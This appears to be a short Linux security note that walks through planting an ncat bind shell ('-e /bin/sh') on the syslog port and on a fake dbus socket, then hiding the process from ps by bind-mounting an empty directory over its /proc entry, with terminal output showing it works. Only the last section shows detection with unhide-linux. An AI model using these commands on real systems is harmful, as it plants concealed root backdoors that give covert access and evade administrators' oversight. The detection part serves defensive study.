Hidden procesess

Hiding a process behind syslog process, using the same port

ncat listening on port 514 ( syslogd ) and offering a shell

root@hp2:~#  (ncat -l 514 -k -e /bin/sh)&  
We have access
root@hp2:~#  ncat localhost 514 

The process can be easily spotted

root@hp2:~# ps -ef |grep [n]cat
708 548 0:00 0:50 3848 1460 root S ncat -l 1234 -k -e /bin/ash

Hiding the process

root@hp2:~# mkdir /media/null 
root@hp2:~# mount -o bind /media/null/ /proc/708 

The process is not listed

root@hp2:~# ps -ef |grep [n]cat 

The open port is not easy to find

root@asus:~# netstat -tlanup|grep 514 
tcp        0      0   *       LISTEN      -
tcp6       0      0 :::514                  :::*                    LISTEN      -
udp        0      0   *                           572/syslogd

UNIX socket

root@asus:~#  (ncat -l  -U /var/run/dbus/system_bus_control  -k -e /bin/sh )& 
root@asus:~#  ps -ef |grep [n]cat 
root      4433  1921  0 15:14 pts/0    00:00:00 ncat -l -U /var/run/dbus/system_bus_control -k -e /bin/sh
root@asus:~# mount -o bind /media/null/ /proc/4433 
root@asus:~#  ps -ef |grep [n]cat 
root@asus:~# ncat -U /var/run/dbus/system_bus_control 
root@asus:~# ss -xlp|grep system_bus_socket 
u_str   LISTEN   0        128         /var/run/dbus/system_bus_socket 23858                   * 0       users:(("dbus-daemon",pid=880,fd=4))             

Counter measure

root@asus:~#  ./unhide-linux quick 
Unhide 20121229
Copyright © 2012 Yago Jesus & Patrick Gouin
License GPLv3+ : GNU GPL version 3 or later

Used options: 
[*]Searching for Hidden processes through  comparison of results of system calls, proc, dir and ps

Found HIDDEN PID: 4433 <----------------
Cmdline: "<none>"
Executable: "<no link>"
"<none>  ... maybe a transitory process"